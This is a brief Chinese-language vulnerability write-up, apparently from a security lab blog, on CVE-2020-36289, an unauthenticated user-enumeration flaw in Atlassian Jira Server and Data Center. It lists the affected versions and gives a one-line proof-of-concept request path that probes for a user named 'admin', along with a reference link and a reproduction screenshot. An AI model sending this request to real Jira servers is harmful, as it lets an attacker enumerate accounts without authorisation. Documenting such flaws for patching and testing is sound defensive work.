CVE-2020-36289
漏洞描述:受影响的 Atlassian Jira 服务器和数据中心版本允许未经身份验证的用户通过 QueryComponentRendererValue!Default.jspa 端点中的信息披露漏洞枚举用户。受影响的版本为 8.5.13 之前的版本、8.13.5 之前的 8.6.0 版本以及 8.15.1 之前的 8.14.0 版本。
POC:secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
参考文献:https://twitter.com/ptswarm/status/1402644004781633540
复现:
![图片[1]-【初级】Jira 信息泄露-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd092558-1024x488.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容